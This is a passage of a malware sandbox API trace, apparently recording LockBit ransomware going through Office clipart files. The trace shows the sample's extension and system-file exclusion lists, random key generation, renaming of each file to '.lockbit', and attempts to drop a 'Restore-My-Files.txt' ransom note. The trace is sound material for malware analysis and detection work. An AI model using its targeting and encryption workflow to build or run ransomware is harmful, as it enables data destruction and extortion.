lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD05119_.WMF") returned 1 [0103.703] lstrcmpiW (lpString1="ntldr", lpString2="BD05119_.WMF") returned 1 [0103.703] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD05119_.WMF") returned 1 [0103.703] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD05119_.WMF") returned 1 [0103.703] lstrcmpiW (lpString1="autorun.inf", lpString2="BD05119_.WMF") returned -1 [0103.703] lstrcmpiW (lpString1="thumbs.db", lpString2="BD05119_.WMF") returned 1 [0103.703] lstrcmpiW (lpString1="iconcache.db", lpString2="BD05119_.WMF") returned 1 [0103.703] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.703] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned=".WMF" [0103.703] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.703] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.703] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.704] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.704] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.lockbit") returned 72 [0103.704] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0103.705] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.705] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.705] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17236) returned 1 [0103.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.706] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.706] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.711] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.711] malloc (_Size=0xa6) returned 0x77d800 [0103.711] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.723] free (_Block=0x77d800) [0103.723] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.723] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.723] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3ef0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD06102_.WMF", cAlternateFileName="")) returned 1 [0103.724] lstrcmpiW (lpString1=".", lpString2="BD06102_.WMF") returned -1 [0103.724] lstrcmpiW (lpString1="..", lpString2="BD06102_.WMF") returned -1 [0103.724] PathFindExtensionW (pszPath="BD06102_.WMF") returned=".WMF" [0103.724] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.724] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.725] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD06102_.WMF") returned 1 [0103.725] lstrcmpiW (lpString1="ntldr", lpString2="BD06102_.WMF") returned 1 [0103.725] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD06102_.WMF") returned 1 [0103.725] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD06102_.WMF") returned 1 [0103.725] lstrcmpiW (lpString1="autorun.inf", lpString2="BD06102_.WMF") returned -1 [0103.725] lstrcmpiW (lpString1="thumbs.db", lpString2="BD06102_.WMF") returned 1 [0103.725] lstrcmpiW (lpString1="iconcache.db", lpString2="BD06102_.WMF") returned 1 [0103.725] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.725] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned=".WMF" [0103.725] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.725] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.725] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.726] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.726] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.lockbit") returned 72 [0103.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0103.727] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.727] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.727] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16112) returned 1 [0103.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.727] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.728] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.735] malloc (_Size=0xa6) returned 0x77d800 [0103.735] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0103.735] free (_Block=0x77d800) [0103.736] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.736] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.736] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD06200_.WMF", cAlternateFileName="")) returned 1 [0103.736] lstrcmpiW (lpString1=".", lpString2="BD06200_.WMF") returned -1 [0103.736] lstrcmpiW (lpString1="..", lpString2="BD06200_.WMF") returned -1 [0103.736] PathFindExtensionW (pszPath="BD06200_.WMF") returned=".WMF" [0103.736] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.736] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.737] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.737] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD06200_.WMF") returned 1 [0103.737] lstrcmpiW (lpString1="ntldr", lpString2="BD06200_.WMF") returned 1 [0103.737] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD06200_.WMF") returned 1 [0103.737] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD06200_.WMF") returned 1 [0103.737] lstrcmpiW (lpString1="autorun.inf", lpString2="BD06200_.WMF") returned -1 [0103.737] lstrcmpiW (lpString1="thumbs.db", lpString2="BD06200_.WMF") returned 1 [0103.737] lstrcmpiW (lpString1="iconcache.db", lpString2="BD06200_.WMF") returned 1 [0103.738] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.738] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned=".WMF" [0103.738] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.738] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.738] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.739] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.lockbit") returned 72 [0103.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0103.740] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.740] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.740] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16676) returned 1 [0103.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.741] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0105.302] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0105.302] malloc (_Size=0xa6) returned 0x77d800 [0105.302] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0105.343] free (_Block=0x77d800) [0105.343] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft 